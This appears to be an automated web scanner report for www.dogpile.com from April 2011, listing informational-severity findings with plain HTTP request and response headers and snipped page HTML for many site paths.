HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:14:32 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45022 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=ba3967d2 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile/ws/contactUs/ |
GET /dogpile/ws/contactUs/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.infospaceinc User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:12:56 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 43573 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=ba3967d2 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile/ws/contactUs |
GET /dogpile/ws/contactUs Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:14:27 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 43577 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=ba3967d2 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile/ws/faq/rfcid=416 |
GET /dogpile/ws/faq/rfcid=416 Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:14:30 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 64231 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=ba3967d2 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile/ws/results/Web |
GET /dogpile/ws/results/Web Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3725104394 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3741881610 Set-Cookie: wsRecent=april+fools+day X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:10:54 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 160297 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=26f28f0a } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws |
GET /dogpile_other/ws Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:58:00 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 42237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/faq/ |
GET /dogpile_other/ws/faq/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:32 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45965 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/faq/ |
GET /dogpile_other/ws/faq/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:58:36 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 64613 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/index |
GET /dogpile_other/ws/index HTTP/1.1 Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainSession=Transa |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:03 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45953 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/index |
GET /dogpile_other/ws/index HTTP/1.1 Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:27 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45971 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/index |
GET /dogpile_other/ws/index Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:14:55 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45953 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=ba3967d2 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/index |
GET /dogpile_other/ws/index Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:14:53 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 32540 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=ba3967d2 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws |
GET /dogpile_other/ws Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Fri, 01 Apr 2011 17:14:46 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:14:46 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 51063 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=ba3967d2 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/redir/ |
POST /dogpile_other/ws/redir/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com Content-Length: 2186 Cache-Control: max-age=0 Origin: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 __VIEWSTATE=%2FwEPDw ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3808990474 Set-Cookie: wsRecent=site%3axss.cx X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:58:01 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 65245 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/redir |
GET /dogpile_other/ws/redir Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:15:41 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45950 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=40db304f } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/redir |
GET /dogpile_other/ws/redir Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3741881610 Set-Cookie: wsRecent=Review+Sites,Web X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:15:34 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 159313 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=8a9366cf } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/redir |
GET /dogpile_other/ws/redir Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3808990474 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3792213258 Set-Cookie: wsRecent=Submit+Site,Web X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:15:31 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 159334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=40db304f } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/results |
GET /dogpile_other/ws/results Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3808990474 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:15:54 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45969 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=5d61898c } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/web/GE+Zero |
GET /dogpile_rss/web/GE+Zero Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3725104394 Set-Cookie: wsRecent=GE+Zero+Taxes X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:59:23 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 160992 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/web/Go+Daddy |
GET /dogpile_rss/web/Go+Daddy Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainSession=Transa |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3792213258 Set-Cookie: wsRecent=Go+Daddy+CEO X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:33 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 162009 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/ws/about/ |
GET /dogpile_rss/ws/about/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3725104394 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:01:51 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45270 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/ws/faq/ |
GET /dogpile_rss/ws/faq/ Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:01:52 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 64503 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/ws/index/ |
GET /dogpile_rss/ws/index/? Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3725104394 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:09:21 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45843 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=26f28f0a } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.dogpile.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3725104394 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:07:56 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45969 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /info.dogpl.rss/Web6c5ea/ |
GET /info.dogpl.rss/Web6c5ea/ Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3725104394 |
